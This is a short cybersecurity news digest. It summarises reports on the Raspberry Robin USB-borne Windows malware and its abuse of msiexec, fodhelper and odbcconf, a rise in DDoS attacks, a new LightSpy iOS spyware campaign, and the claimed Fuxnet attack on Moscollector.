BleepingComputer reports that various networks, including those from entities in the technology and manufacturing industries, have been impacted by the novel Raspberry Robin malware that infects Windows systems through infected USB drives.
Raspberry Robin exploits the Microsoft Standard Installer to communicate with command-and-control servers, a report from Red Canary revealed. "While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said researchers. The report added that a malicious DLL is being launched by Raspberry Robin along with the fodhelper and odbcconf utilities, with the former enabling User Account Control evasion and the latter allowing DLL configuration and execution. However, questions remain about the activity of Raspberry Robin. "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis," researchers added.
Fifty percent more distributed denial-of-service attacks have been launched by threat actors during the first quarter of 2024 over the same period last year, with thwarted DDoS attacks increasing by 93% year-over-year, SiliconAngle reports.
Security Affairs reports that attacks with an updated iteration of the LightSpy iOS spyware using the "F_Warehouse" framework have been deployed against Southern Asian targets as part of a new cyberespionage campaign.
Operations of Russia's industrial sensor and monitoring infrastructure were claimed to have been disrupted by Ukrainian hacking operation Blackjack following a Fuxnet malware attack against Moscow-based underground infrastructure firm Moscollector, reports SecurityWeek.